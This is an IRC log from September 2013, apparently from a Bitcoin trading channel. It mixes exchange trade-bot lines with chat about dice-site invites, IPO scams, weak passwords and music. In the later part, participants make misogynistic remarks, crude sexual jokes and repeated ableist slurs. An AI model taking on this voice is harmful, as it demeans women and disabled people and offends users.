[CBTC] 4735 @ 0.00030289 = 1.4342 BTC [+] Sep 11 06:57:35 [HAVELOCK] [CBTC] 22362 @ 0.00030999 = 6.932 BTC [+] Sep 11 06:57:37 [HAVELOCK] [CBTC] 1000 @ 0.00031 = 0.31 BTC [+] Sep 11 06:57:39 [HAVELOCK] [CBTC] 52000 @ 0.00031 = 16.12 BTC [+] Sep 11 06:57:41 [HAVELOCK] [CBTC] 5500 @ 0.00031 = 1.705 BTC [+] Sep 11 06:57:43 [HAVELOCK] [CBTC] 79 @ 0.00031 = 0.0245 BTC [+] Sep 11 06:57:45 [HAVELOCK] [CBTC] 4 @ 0.00031889 = 0.0013 BTC [+] Sep 11 06:57:47 [HAVELOCK] [CBTC] 4553 @ 0.00032 = 1.457 BTC [+] Sep 11 06:58:12 new dice site testing, get a low number: https://letsdice.com/?invite_info=184.1378958222.e06722105e30801214cd353d08175c04 Sep 11 06:58:16 [HAVELOCK] [CBTC] 15447 @ 0.00032 = 4.943 BTC [+] Sep 11 06:58:22 one invite per, pm if you need more Sep 11 06:59:30 dont spam me bra Sep 11 07:00:25 benkay: mircea_popescu https://docs.google.com/spreadsheet/ccc?key=0AlhB0UHVxS67dGpBc2Rub3FtLTdHZ3ZPb09DY2pHWlE#gid=0 Sep 11 07:00:44 someone was in need of dice invites ?! Sep 11 07:02:03 agreed, somewhat strange business model, but apparently this one is invite-only Sep 11 07:02:26 [BTCTC] [LABCOIN] 5 @ 0.00367 = 0.0184 BTC [-] Sep 11 07:03:13 i wonder if the invite codes are haxable. Sep 11 07:03:22 prolly Sep 11 07:03:28 most ppl suck at sec Sep 11 07:04:18 iirc this is the guy that delivered a reasonably bad beat to justdice ? Sep 11 07:04:42 something like that Sep 11 07:05:03 your -pr chick is doing the usual routine in his thread Sep 11 07:05:45 what's she say this time Sep 11 07:06:08 tried to summon her in https://bitcointalk.org/index.php?topic=288588.0 Sep 11 07:06:21 but this thread is borderline parody Sep 11 07:06:38 take a wild guess: Sep 11 07:06:41 SCAM! Sep 11 07:06:49 srsly ? Sep 11 07:06:58 like I said, the usual routine Sep 11 07:07:10 link ? Sep 11 07:07:24 https://bitcointalk.org/index.php?topic=288036.0;all Sep 11 07:07:29 "You don't often get to read bullshits so big and weird...", hehe Sep 11 07:07:31 [IPO] Letsdice.com IPO Prospectus Sep 11 07:07:39 probably rightfully so this time though, Sep 11 07:07:52 lol Sep 11 07:08:00 [BTCTC] [TAT.ASICMINER] 8 @ 0.02177 = 0.1742 BTC [+] Sep 11 07:08:01 well she has a fucking point, wtf, "send btc to this address" Sep 11 07:08:07 given how this was just unknown guy asking for money sent to address x Sep 11 07:08:34 ya, pretty balsy Sep 11 07:08:50 but apparently whoever's behind this isn't exactly lacking balls Sep 11 07:09:47 i thought it was meanwhile verified that the guy essentially sent himself like 5k btc or w/e Sep 11 07:10:13 yup, something like that Sep 11 07:10:37 but at least it appears they have a somewhat real looking dice site now Sep 11 07:10:38 pankkake people with the ndas crack me up, seriously. Sep 11 07:11:14 i don't think it has yet happened that anyone signed a nda for some random dork with no track record and no money. Sep 11 07:11:19 and i mean, never, literally, not once. Sep 11 07:11:33 maybe it's one of those who think ideas are worth more than doing the stuff Sep 11 07:12:14 bitcointalk being easier to use than freelancer.com or some shit Sep 11 07:12:35 [BTCTC] [DMS.PURCHASE] 23 @ 0.01203 = 0.2767 BTC [-] Sep 11 07:12:56 I wonder why there's not freelancer for bitcoin yet Sep 11 07:13:04 well there are some but they are unusable Sep 11 07:13:20 [BTCTC] [LABCOIN] 50 @ 0.00367 = 0.1835 BTC [-] Sep 11 07:13:33 dat volume problem Sep 11 07:13:40 someone author a MOOC for buttcoin IPO scams http://www.ft.com/intl/cms/s/0/3e4ce9ce-1a59-11e3-93e8-00144feab7de.html?siteedition=intl#axzz2eWULFf4c Sep 11 07:13:48 yeah, but tax free labor! Sep 11 07:13:56 [BTCTC] [LABCOIN] 1 @ 0.003579 BTC [-] Sep 11 07:13:58 [BTCTC] [LABCOIN] 5 @ 0.003578 = 0.0179 BTC [-] Sep 11 07:13:59 [BTCTC] [LABCOIN] 109 @ 0.003492 = 0.3806 BTC [-] Sep 11 07:14:12 of what quality? Sep 11 07:14:13 pankkake i have been sorta intending to destroy freelancer for five or so years Sep 11 07:14:27 never quite bothered to sit down and actually do it, but they suck so bad it's indescribable. Sep 11 07:14:37 while those sites are mostly shit jobs and shit people, I know that when I work in a legit company, I will only see half of it Sep 11 07:14:53 i imagine i'm one of ten thousand peiople that noticed how fucking retarded they are. Sep 11 07:15:13 I know someone that uses it for design work, they seem happy Sep 11 07:15:24 I know people who paid for rentacoder coders; the result was bad Sep 11 07:15:39 hmm I've seen good things from CSS guys Sep 11 07:15:57 css Sep 11 07:15:59 dub it's a gnarly, spammy mess of stupid nonsense. Sep 11 07:16:00 coding Sep 11 07:16:03 bar har har Sep 11 07:16:08 design as in art, for wine bottles and sales collateral Sep 11 07:16:21 benkay: exactly. it's easy to estimate css, it's not for development Sep 11 07:16:26 spammy nonsense, dub. Sep 11 07:16:28 so you end up with shitty work in the end Sep 11 07:16:32 advertising is full of hacks. Sep 11 07:17:09 https://bitcointalk.org/index.php?topic=252531.msg3127085#msg3127085 This is so sad I don't understand how ken can do this too us. Sep 11 07:17:14 [ActiveMining] The Official Active Mining Discussion Thread Sep 11 07:17:18 I'm going to feel bad at some point Sep 11 07:17:21 I have empathy Sep 11 07:17:42 pankkake i have Empathy too. Sep 11 07:17:50 comments made to the effect of either contracting some local firm at large expense or getting literally hundreds of concepts for free an dpaying peanuts to the one you like Sep 11 07:17:51 she's usually black and blue and in chains, but it goes with her complexion. Sep 11 07:18:38 -Emails come through with HTML, since an SMTP mail server was not hooked up to it. Sep 11 07:18:38 Built it in 3 weeks while home from work staying up to 4 am most nights. Sep 11 07:18:38 Fully AJAX (quick loads, no page refreshes) Sep 11 07:18:40 great. lol. Sep 11 07:18:54 internets are serious engineering, mircea_popescu. Sep 11 07:19:05 [HAVELOCK] [AM100] 1 @ 0.021 BTC [+] Sep 11 07:19:12 gosh Sep 11 07:19:17 where the fuck is that redditard Sep 11 07:19:19 nobody will buy shares if html has tables Sep 11 07:19:36 http://www.reddit.com/r/Bitcoin/comments/ybaut/do_not_invest_in_bitdaytrade_this_website_is/ Sep 11 07:19:42 everyone should read that like monthly. Sep 11 07:20:09 mircea_popescu: I thought you were refering to the IM client, but I don't understand the rest Sep 11 07:20:41 man the NSA has it so easy Sep 11 07:20:56 [HAVELOCK] [SDSTM] 3 @ 0.003 = 0.009 BTC [+] Sep 11 07:21:11 pankkake girl's name. Sep 11 07:21:16 im auditing a wholesale visp type thingy, looking at LNS passwords chosen by downstream ISPen.. for FUCKS SAKE Sep 11 07:22:10 l33tpa55br0 thesecret etc Sep 11 07:22:30 "there's always another level. just be content knowing that you are still better off than most who have ever lived" Sep 11 07:22:38 dub : replace all with "yourmotherlaidastupidegg" Sep 11 07:22:40 but you see there's that next leve RIGHT THE FUCK THERE. Sep 11 07:23:05 which incidentally wasn't such a bad password up until a minute ago. Sep 11 07:23:13 [MPEX] [S.MPOE] 11700 @ 0.00088431 = 10.3464 BTC [-] Sep 11 07:23:16 nah. Sep 11 07:23:18 disagree. Sep 11 07:23:24 leetspeek generators are a thing Sep 11 07:23:35 oh ymlase Sep 11 07:23:49 dub: I don't know if it's universal, but password for French companies are usually nameofthecompany2013 Sep 11 07:24:01 i dunno man. you can still crack those. permutations of number of english words is far fewer than permutations of characters. Sep 11 07:24:30 yeah, some genius setup a process at a previous empoyer where default account waswords were Sep 11 07:24:34 benkay you familiar with the concept of a dicelist ? Sep 11 07:25:07 http://trilema.com/2012/romanian-dicelist/ (yes i made the romanian language dicelist) Sep 11 07:25:10 [BTCTC] [DMS.SELLING] 84 @ 0.0096 = 0.8064 BTC [-] Sep 11 07:25:33 hmm it's one of my fears of dealing with bitcoins, getting the target of hackers Sep 11 07:25:56 aren't you still n! on the wordlist length? Sep 11 07:25:56 I am fairly up to date with good security practices, but never had been under that kind of pressure Sep 11 07:26:22 benkay no, read the article footnotes (all english) Sep 11 07:26:35 well, n! - n(n-dice #)! Sep 11 07:27:12 dance party time i'll read it later Sep 11 07:27:22 it's basically a shade under 13 bits of entropy per word. Sep 11 07:27:51 benkay: http://www.youtube.com/watch?v=uxi73RQlLB8 bust some of these out Sep 11 07:28:06 [BTCTC] [LABCOIN] 1 @ 0.003512 BTC [+] Sep 11 07:28:08 [BTCTC] [LABCOIN] 5 @ 0.003511 = 0.0176 BTC [-] Sep 11 07:28:09 [BTCTC] [LABCOIN] 33 @ 0.003508 = 0.1158 BTC [-] Sep 11 07:28:10 [BTCTC] [LABCOIN] 100 @ 0.003507 = 0.3507 BTC [-] Sep 11 07:28:11 [BTCTC] [LABCOIN] 2 @ 0.003485 = 0.007 BTC [-] Sep 11 07:28:13 [BTCTC] [LABCOIN] 189 @ 0.003483 = 0.6583 BTC [-] Sep 11 07:28:14 [BTCTC] [LABCOIN] 567 @ 0.003461 = 1.9624 BTC [-] Sep 11 07:28:15 [BTCTC] [LABCOIN] 81 @ 0.003456 = 0.2799 BTC [-] Sep 11 07:28:15 [BTCTC] [LABCOIN] 245 @ 0.003455 = 0.8465 BTC [-] Sep 11 07:28:16 [BTCTC] [LABCOIN] 33 @ 0.003451 = 0.1139 BTC [-] Sep 11 07:28:17 [BTCTC] [LABCOIN] 99 @ 0.00345 = 0.3416 BTC [-] Sep 11 07:28:18 [BTCTC] [LABCOIN] 1159 @ 0.003444 = 3.9916 BTC [-] Sep 11 07:28:20 [BTCTC] [LABCOIN] 486 @ 0.003443 = 1.6733 BTC [-] **** ENDING LOGGING AT Wed Sep 11 07:33:27 2013 **** BEGIN LOGGING AT Wed Sep 11 16:26:40 2013 Sep 11 16:27:10 http://open.spotify.com/track/1yzGXVKNrjyuvPyehwF0YA Sep 11 16:27:15 First... And Then - feat. Dres by Handsome Boy Modeling School on Spotify Sep 11 16:27:19 Dres from Black Sheep Sep 11 16:27:57 oh geez i forgot to bring up like my favorite, Killer Mike Sep 11 16:28:03 RAP Album is so good Sep 11 16:28:09 [HAVELOCK] [AM100] 1 @ 0.0211 BTC [-] Sep 11 16:28:25 [HAVELOCK] [AM100] 19 @ 0.0209 = 0.3971 BTC [-] Sep 11 16:28:30 My favorite song by HBMS is "I've been thinking" Sep 11 16:28:38 [HAVELOCK] [DEALCO] 91 @ 0.0105 = 0.9555 BTC [+] Sep 11 16:28:43 aphex twin, squarepusher? Sep 11 16:28:44 I love how they have an album called "White People" Sep 11 16:28:44 lel @ dealco Sep 11 16:28:56 hmm, i used to be huge into aphex Sep 11 16:29:01 hehe Sep 11 16:29:02 where is the first bitcoin based record label Sep 11 16:29:07 we need to be makin' beats Sep 11 16:29:09 tat is working on it Sep 11 16:29:11 fuck dis mining shit Sep 11 16:29:13 haha Sep 11 16:29:19 now that's an IPO i'd buy and hold Sep 11 16:29:22 i heard his beats, they're hot Sep 11 16:29:39 wasn't there someone on btctalk trying to get a group buy set up for coolio's entire library? Sep 11 16:29:52 he's doing a entertainment label, music and short films sold via bitcoin Sep 11 16:30:19 i wonder will he sign my band Sep 11 16:30:35 (i don't actually wonder) Sep 11 16:30:36 random fact, the name Thick As Thieves was tagged for use as a label name Sep 11 16:30:37 maybe, send a demo Sep 11 16:30:41 but then bitcoin happened Sep 11 16:30:55 [BTCTC] [KENILWORTH] 1 @ 0.001769 BTC [-] Sep 11 16:31:12 i'm going to register thickasthieves.com and sell it to you for 100 btc Sep 11 16:31:13 cool? Sep 11 16:31:15 sweet Sep 11 16:31:18 already tried Sep 11 16:31:19 /extortion Sep 11 16:32:03 [MPEX] [S.MPOE] 4700 @ 0.00089418 = 4.2026 BTC [+] Sep 11 16:32:53 a name change for the bitcoin stuff is imminent Sep 11 16:32:58 so it could still happen Sep 11 16:33:34 [HAVELOCK] [CBTC] 10000 @ 0.00032999 = 3.2999 BTC [-] Sep 11 16:33:36 [HAVELOCK] [CBTC] 999 @ 0.00033 = 0.3297 BTC [+] Sep 11 16:33:39 [HAVELOCK] [CBTC] 10000 @ 0.00033 = 3.3 BTC [+] Sep 11 16:33:41 [HAVELOCK] [CBTC] 1000 @ 0.00034 = 0.34 BTC [+] Sep 11 16:33:43 [HAVELOCK] [CBTC] 1000 @ 0.00034844 = 0.3484 BTC [+] Sep 11 16:33:45 [HAVELOCK] [CBTC] 1000 @ 0.00035 = 0.35 BTC [+] Sep 11 16:33:47 [HAVELOCK] [CBTC] 6001 @ 0.00035 = 2.1004 BTC [+] Sep 11 16:33:59 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00061 BTC [+] Sep 11 16:34:02 [HAVELOCK] [CBTC] 3999 @ 0.00035 = 1.3997 BTC [+] Sep 11 16:34:41 "MPOE, if you ever need a white knight, feel free to gimme a call" Sep 11 16:34:43 well, if you do, you should get a logo contest started up Sep 11 16:34:51 lol Sep 11 16:34:53 TAT RECORDS Sep 11 16:34:55 you dont know me Sep 11 16:35:05 i abhor logo contests Sep 11 16:35:07 i don't know any of you ;( Sep 11 16:35:20 fuck it then, just pay me and my wife to make one :P Sep 11 16:35:29 which one of you holds the mouse? Sep 11 16:35:34 [BTCTC] [ACTIVEMINING] 10 @ 0.003493 = 0.0349 BTC [+] Sep 11 16:35:35 [BTCTC] [ACTIVEMINING] 2 @ 0.003494 = 0.007 BTC [+] Sep 11 16:35:37 [BTCTC] [ACTIVEMINING] 50 @ 0.00352 = 0.176 BTC [+] Sep 11 16:35:38 [BTCTC] [ACTIVEMINING] 12 @ 0.003543 = 0.0425 BTC [+] Sep 11 16:35:39 [BTCTC] [ACTIVEMINING] 226 @ 0.003586 = 0.8104 BTC [+] Sep 11 16:35:41 she holds the pencil, i hold the mouse Sep 11 16:36:09 makes sense Sep 11 16:36:28 i can't draw for shit, and she's not great with ps/illustrator Sep 11 16:36:35 but with our powers combined... Sep 11 16:36:42 voltron Sep 11 16:37:17 exactly Sep 11 16:38:20 [BTCTC] [DMS.MINING] 13 @ 0.00265 = 0.0345 BTC [+] Sep 11 16:38:21 [BTCTC] [DMS.MINING] 65 @ 0.00265 = 0.1723 BTC [+] Sep 11 16:38:22 [BTCTC] [DMS.MINING] 15 @ 0.002661 = 0.0399 BTC [+] Sep 11 16:38:23 [BTCTC] [DMS.MINING] 27 @ 0.00268 = 0.0724 BTC [+] Sep 11 16:38:25 [BTCTC] [DMS.MINING] 100 @ 0.002689 = 0.2689 BTC [+] Sep 11 16:38:25 [BTCTC] [DMS.MINING] 100 @ 0.00269 = 0.269 BTC [+] Sep 11 16:38:26 [BTCTC] [DMS.MINING] 80 @ 0.00269 = 0.2152 BTC [+] Sep 11 16:38:32 my drawing style is too noisy for most things anyway Sep 11 16:38:55 http://imgur.com/a/rpxO9 Sep 11 16:38:57 Photo Album - Imgur Sep 11 16:38:59 about as good as it gets right there Sep 11 16:39:50 whats does it say? Sep 11 16:40:00 "a whale and other disorders" Sep 11 16:40:08 it's a zine we publish Sep 11 16:40:17 http://pinkeyeprints.com/2013/05/06/we-released-issue-2-of-our-art-zine/ Sep 11 16:40:20 AWAOD issue #2 | Pink Eye Print Company Sep 11 16:40:21 ThickAsThieves what's that ? Sep 11 16:40:28 I am attila. Sep 11 16:40:56 nubbins` that's a fucking match made in heaven for you. Sep 11 16:40:59 does she ever get on irc ? Sep 11 16:41:16 nah Sep 11 16:44:29 [HAVELOCK] [XBOND] 24 @ 0.001177 = 0.0282 BTC [+] Sep 11 16:44:38 [HAVELOCK] [CBTC] 5 @ 0.00036 = 0.0018 BTC [+] Sep 11 16:45:04 someone on forums hitting on PR Sep 11 16:45:33 o Sep 11 16:45:47 i would like to slip a thumb in Sep 11 16:45:51 lol Sep 11 16:45:53 shame on me for imagining the forum has propriety of terms Sep 11 16:46:06 white knights being in finance those investors coming to rescue a company in a bad merger Sep 11 16:46:32 sneak peek of a concept sketch for the Eulora heraldics: http://imgur.com/Rx0KQDZ Sep 11 16:46:46 so you know, waking up to "let me know if you want a white knight" is what happens to you when you wake up to discover someone's put the moves down for a merger and you had no idea. Sep 11 16:47:16 nubbins` is that karpeles ? Sep 11 16:48:14 i'm gonna say no, given that i'm not sure who/what karpeles is Sep 11 16:48:36 OH Sep 11 16:48:37 haha Sep 11 16:48:58 i google image searched "karpeles monster" Sep 11 16:49:00 lol Sep 11 16:49:06 http://cdn1.benzinga.com/files/imagecache/400x600S/mtgox_ceo_mark_karpeles.jpg Sep 11 16:49:30 interestingly, if you remove the word "monster", that image doesn't appear in the results Sep 11 16:49:40 lol. see how google works ? Sep 11 16:49:48 cookie monster Sep 11 16:49:49 it knows so much! Sep 11 16:49:57 ThickAsThieves: LEL Sep 11 16:50:20 anyway, i thought similar lips/mouth structure. Sep 11 16:50:37 similar penchant for consuming human souls Sep 11 16:50:39 http://i.imgur.com/aHVZR4R.gif Sep 11 16:50:50 :0 Sep 11 16:50:54 [HAVELOCK] [XBOND] 8 @ 0.001177 = 0.0094 BTC [+] Sep 11 16:51:10 http://i.imgur.com/F3hk56S.gif Sep 11 16:51:10 [BTCTC] [ASICMINER-PT] 2 @ 2.315 = 4.63 BTC [+] Sep 11 16:51:20 found this while hotel searching Sep 11 16:51:24 "DE LUX FAMILY ROOMS..................[ No BALCONY ] Sep 11 16:51:24 with a direct Full Canal view. Sep 11 16:51:24 [Reservations for Male Groups are not accepted]." Sep 11 16:51:25 now the goat looks like he knows what he's doing Sep 11 16:51:28 [HAVELOCK] [SMG] 12 @ 0.0002 = 0.0024 BTC [+] Sep 11 16:51:43 Male Groups Sep 11 16:51:49 goats always do. Sep 11 16:51:57 that's a great name for an all-woman band Sep 11 16:52:08 [BTCTC] [ASICMINER-PT] 1 @ 2.316 BTC [+] Sep 11 16:52:09 they're the sluts of animal kingdom basically, and i suspect gangbangs in humans might well be a learned behaviour Sep 11 16:52:12 learned from goats. Sep 11 16:52:19 Don't all male groups prefer full view of the canal? Sep 11 16:52:31 http://24.media.tumblr.com/tumblr_m8k8ubnSJA1r3ak02o1_500.gif Sep 11 16:52:35 [HAVELOCK] [XBOND] 2 @ 0.001177 = 0.0024 BTC [+] Sep 11 16:52:53 [BTCTC] [ASICMINER-PT] 5 @ 2.318 = 11.59 BTC [+] Sep 11 16:52:54 [HAVELOCK] [CBTC] 203 @ 0.00036 = 0.0731 BTC [+] Sep 11 16:53:02 ThickAsThieves hm ? Sep 11 16:53:21 deluxe family rooms with a direct full anal view Sep 11 16:53:31 lol Sep 11 16:53:32 [HAVELOCK] [CBTC] 100 @ 0.00037 = 0.037 BTC [+] Sep 11 16:53:33 no balcony Sep 11 16:53:59 bawl cony. Sep 11 16:54:46 balkan E Sep 11 16:54:53 [HAVELOCK] [AM100] 95 @ 0.02119 = 2.0131 BTC [+] Sep 11 16:55:18 [HAVELOCK] [CBTC] 1500 @ 0.00038 = 0.57 BTC [+] Sep 11 16:55:19 (from Italian: balcone, scaffold) Sep 11 16:55:20 [HAVELOCK] [CBTC] 500 @ 0.000399 = 0.1995 BTC [+] Sep 11 16:55:22 [HAVELOCK] [CBTC] 5000 @ 0.0003998 = 1.999 BTC [+] Sep 11 16:55:24 [HAVELOCK] [CBTC] 5500 @ 0.00039999 = 2.1999 BTC [+] Sep 11 16:55:50 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00061 = 0.0018 BTC [+] Sep 11 16:55:55 [BTCTC] [TAT.ASICMINER] 8 @ 0.02178 = 0.1742 BTC [+] Sep 11 16:55:56 [BTCTC] [ASICMINER-PT] 8 @ 2.319 = 18.552 BTC [+] Sep 11 16:56:24 !!! @ cbtc Sep 11 16:56:39 IPOs are great Sep 11 16:56:56 dont they intend to release more shares? Sep 11 16:56:57 scoop up shares, sell em for 100% return, watch them slowly sink into oblivion Sep 11 16:57:11 see dealco, see cfig Sep 11 16:57:14 [HAVELOCK] [CBTC] 9100 @ 0.00039998 = 3.6398 BTC [-] Sep 11 16:57:16 see cbtc Sep 11 16:57:24 labcoin Sep 11 16:57:56 http://www.yosefk.com/blog/my-history-with-forth-stack-machines.html Sep 11 16:57:59 [BTCTC] [TAT.ASICMINER] 12 @ 0.02178 = 0.2614 BTC [+] Sep 11 16:58:01 My history with Forth & stack machines Sep 11 16:58:02 if neone feels like reading old tomes. Sep 11 16:58:26 sad this turned into micro stocks pump and dumps Sep 11 16:58:45 nubbins` plus the warm cuddly feeling of having deprived the initiating scammers of some of their potential gains. Sep 11 16:59:07 [BTCTC] [LABCOIN] 1 @ 0.003637 BTC [+] Sep 11 16:59:10 well yeah, people got tired of pumping alt coins Sep 11 16:59:44 kakobrekla im curious what they'll mutate the shit into next. Sep 11 16:59:55 mircea_popescu i dunno if it changes Sep 11 16:59:59 it was same shit on glbse Sep 11 17:00:01 [HAVELOCK] [AM100] 5 @ 0.02139 = 0.107 BTC [+] Sep 11 17:00:20 [BTCTC] [DMS.MINING] 150 @ 0.002689 = 0.4034 BTC [-] Sep 11 17:00:22 yeah, each IPO share i can sell at 2x "value" is essentially a small public service on my behalf Sep 11 17:00:30 note that glbse wasn't open to the public scamming. glbse was a group of people, the bitcoin.oz dood, goat, the "bankers", kludge, harnett etc Sep 11 17:00:43 scamming on specified shit (giga's friends wit hthe pmbs, these doods with pirate) Sep 11 17:00:51 [HAVELOCK] [CBTC] 900 @ 0.00039998 = 0.36 BTC [-] Sep 11 17:00:52 what about feed ze birds Sep 11 17:00:52 [HAVELOCK] [CBTC] 765 @ 0.00039999 = 0.306 BTC [+] Sep 11 17:00:53 now it's true everyone's scamming on the asic production/farm Sep 11 17:00:55 who was the bitcoin.oz dood? Sep 11 17:00:58 isnt erik involved in there? Sep 11 17:01:03 ClivePalmer noagendamarket, dave hollis. Sep 11 17:01:11 ahh true Sep 11 17:01:13 kakobrekla iirc. Sep 11 17:01:14 there were other outsiders Sep 11 17:01:19 fzb was also there Sep 11 17:01:23 [BTCTC] [DMS.SELLING] 150 @ 0.00949 = 1.4235 BTC [-] Sep 11 17:01:24 mircea_popescu: do you know what happened to giga? He seemed to vanish. Sep 11 17:01:37 thestringpuller he took whatever was left and made his own farm Sep 11 17:01:46 they're doing a few th from what i hear. Sep 11 17:02:01 same thing that happened to the tawsix dood, in the end. Sep 11 17:02:11 more ellaborate, more complex, more credible, more distant in time end. Sep 11 17:02:12 [BTCTC] [DMS.PURCHASE] 150 @ 0.01203 = 1.8045 BTC [-] Sep 11 17:02:13 inabas mining op from glbse is way worse Sep 11 17:02:23 he just closed it couple of days ago Sep 11 17:02:24 the bfls rig thing ? Sep 11 17:02:28 yeah. Sep 11 17:02:30 claiming over 100% roi Sep 11 17:02:34 (based on usd) Sep 11 17:02:38 in dollars lol. yeah. Sep 11 17:02:42 while btc returs = scam Sep 11 17:02:46 [BTCTC] [ASICMINER-PT] 6 @ 2.32 = 13.92 BTC [+] Sep 11 17:02:47 well his lawyer told him he'll get sued in dollars if at all. Sep 11 17:02:48 returns. Sep 11 17:02:54 so that's all cya. Sep 11 17:03:04 effective update Sep 11 17:03:15 TL;DR scammers retreated in the dark recesses, continue on. Sep 11 17:03:17 [HAVELOCK] [CBTC] 1950 @ 0.00039999 = 0.78 BTC [+] Sep 11 17:03:28 ^^^ Sep 11 17:03:33 anyway, back to the point : the problem with scams is that they have no barrier to entry. consequently whenever they become open people run them into the ground. Sep 11 17:03:35 boggles me Sep 11 17:04:00 now, if idiots like burnside didn't provide very convenient administrative barrier to entry by only supporting SOME scammers Sep 11 17:04:11 the entire exchange shit would be pretty much dead by now. Sep 11 17:04:22 even so, it's not much breath of life he's giving them. Sep 11 17:04:44 it's actually surprising how greed can blind people to obvious scams Sep 11 17:04:57 [HAVELOCK] [AM100] 1 @ 0.02139 BTC [+] Sep 11 17:05:11 really, you still find it surprising? Sep 11 17:05:17 people are trained to despise humanity, so what you expect. Sep 11 17:05:19 like, what was it, cryptx? that was promising to pay dividends up to the point where you got your IPO share price back Sep 11 17:05:26 greedy dumb people should just open up a dice site, select their odds, and click the button Sep 11 17:05:35 since that's what the average bitcoin investor does anyways Sep 11 17:05:36 ClivePalmer: i keep thinking people can't get stupider, and i keep getting surprised Sep 11 17:05:40 just look at the last 10,000 years of human history Sep 11 17:05:45 this is nothing new Sep 11 17:05:48 thestringpuller yup, was my motto for justdice, "perfect for the forum investor" Sep 11 17:05:53 ClivePalmer: this may imply that i'm stupid for continually being surprised Sep 11 17:07:06 http://www.theguardian.com/commentisfree/2013/sep/09/titstare-app-women-tech-sexism Sep 11 17:07:10 'Titstare' app at Techcrunch: women in tech deserve better | Amy Gray | Comment is free | theguard Sep 11 17:07:17 [BTCTC] [PETA-MINE] 2 @ 0.6599 = 1.3198 BTC [+] Sep 11 17:07:48 @Amy Gray STFU and start enjoying staring at tits. Sep 11 17:08:01 women want to be equal with men it means THEY LEARN TO ENJOY TITS. Sep 11 17:08:08 it does not mean people quit, it means THEY expand. Sep 11 17:08:12 everything, everywhere. Sep 11 17:08:40 lol you know this was the original definitin of "social inclusion" ? Sep 11 17:09:00 i don't happen to care. Sep 11 17:09:05 [HAVELOCK] [CBTC] 1000 @ 0.000389 = 0.389 BTC [-] Sep 11 17:09:08 [HAVELOCK] [CBTC] 31500 @ 0.00039999 = 12.5997 BTC [+] Sep 11 17:09:13 i fucking hate the entire topic by now with a passion Sep 11 17:09:36 [HAVELOCK] [CBTC] 285 @ 0.00039999 = 0.114 BTC [+] Sep 11 17:09:45 fucktards that can't win at whatever game want to change the rules. Sep 11 17:09:53 [HAVELOCK] [CBTC] 450 @ 0.0004 = 0.18 BTC [+] Sep 11 17:09:55 >implying women are people Sep 11 17:09:57 from the article: "With two 60 second presentations of tits and jerking off..." Sep 11 17:10:02 7yo behaviour, from that one obnoxious kid everyone slapped over the eyes. Sep 11 17:10:02 lel Sep 11 17:10:42 everything else aside, what a masturbatory waste of time. who goes to a conference to see some drooling fuck-up make puns about tits? Sep 11 17:10:47 [HAVELOCK] [CBTC] 265 @ 0.00041 = 0.1087 BTC [+] Sep 11 17:10:49 [BTCTC] [DMS.PURCHASE] 2 @ 0.01203 = 0.0241 BTC [-] Sep 11 17:10:53 just saying "social inclusion" is enough to make my hair stand on end ffs. Sep 11 17:11:04 nubbins` everyone. that's what conferences are. Sep 11 17:11:10 [HAVELOCK] [SMG] 1 @ 0.0002 BTC [+] Sep 11 17:11:11 oic Sep 11 17:11:12 it's like going to the dump and complaining it stinks. Sep 11 17:11:17 bummer Sep 11 17:11:27 oh bummer Sep 11 17:11:31 and then acting as if the dump is the city and going back to hayseed, ok and saying ny smells bad. Sep 11 17:12:00 [HAVELOCK] [AM100] 5 @ 0.021191 = 0.106 BTC [-] Sep 11 17:12:09 the dump isnt even IN ny, it's in fucking jersey. Sep 11 17:12:11 "After reading up more about block trades I feel I must concur with the sentiment that we went about doing these block trades incorrectly. During an IPO there is no "tape" as of yet (like when the shares start to float post-IPO). I took the "arranged price" as stated above to mean that it was permitted for us to negotiate a price based on the block size and timing constraints beyond Sep 11 17:12:11 our control. A better way to have gone about it would have been to announce/advertise potential discounts publically based on a schedule/key (as Jutarul mentions in the ASICMINER example) in the IPO contract itself." Sep 11 17:12:19 https://bitcointalk.org/index.php?topic=269216.msg3129492#msg3129492 Sep 11 17:12:23 [BitFunder] IceDrill.ASIC IPO (500 Thash Mining Operation powered by HashFast) Sep 11 17:12:23 [BTCTC] [BTC-GROWTH] 140 @ 0.09863 = 13.8082 BTC [-] Sep 11 17:12:24 ThickAsThieves bwahaha Sep 11 17:12:25 there's a lovely hiking trail here that passes right next to the dump. little teeny tiny bits of plastic everywhere throughout the forest Sep 11 17:12:26 [BTCTC] [BASIC-MINING] 1 @ 0.1297 BTC [+] Sep 11 17:12:27 ty. Sep 11 17:13:00 [BTCTC] [PETA-MINE] 10 @ 0.6599 = 6.599 BTC [+] Sep 11 17:13:04 this sort of retarded flailing should be in the record. Sep 11 17:13:16 manual writers in the decades to come will find it useful. Sep 11 17:14:10 hm Sep 11 17:14:20 that conference thing reminded me of that MS conference in europe Sep 11 17:14:38 dance music blasting "the words 'micro' and 'soft' don't apply to my penis" Sep 11 17:14:51 i blame balmer. Sep 11 17:14:54 and the closed caption video screen says "(or vagina)" Sep 11 17:15:02 everyone blames ballmer Sep 11 17:15:25 [BTCTC] [DMS.PURCHASE] 22 @ 0.01203 = 0.2647 BTC [-] Sep 11 17:15:27 i think he's the first idiot that gave money to these retards with their advice to be cool. Sep 11 17:15:44 it's always the fault of whoever gives money to retards. Sep 11 17:16:10 giving money to retards is OK as long as you have a plan for getting it back Sep 11 17:16:22 e.g.: welfare cheques + video lottery terminals Sep 11 17:16:24 nope, it's the only sin. as retards should never havem oney. Sep 11 17:16:26 any of it. at all. Sep 11 17:16:56 if you do everything else including raping your infant mother and killing random people a la johnny the homicidal maniac, Sep 11 17:17:03 but you never ever under any circumstances give money to retards Sep 11 17:17:07 you still go to heaven, plus Sep 11 17:17:17 all the other trims, like 40 virgins, nirvana etc. Sep 11 17:17:37 mircea_popescu: you got a P.O. box, we want to send you cookies as bribes. Sep 11 17:17:56 [BTCTC] [KENILWORTH] 100 @ 0.001768 = 0.1768 BTC [-] Sep 11 17:18:08 speaking of retards and money Sep 11 17:18:18 i thought this was heaven? Sep 11 17:18:22 the other day, a frail, nervous-looking woman knocked on my door Sep 11 17:18:40 when i answered, she held out her hand, with a gold necklace in it, and asked if i wanted to buy it Sep 11 17:18:50 [BTCTC] [DMS.SELLING] 16 @ 0.009593 = 0.1535 BTC [+] Sep 11 17:18:54 thestringpuller http://www.vrajitorul.eu/en/firma/22530016/polimedia-srl Sep 11 17:18:57 you can always use that. Sep 11 17:19:13 so i said "my wife's a cop, she might want it" and the lady ran away ;( Sep 11 17:19:33 nice bribes will be sent Sep 11 17:19:34 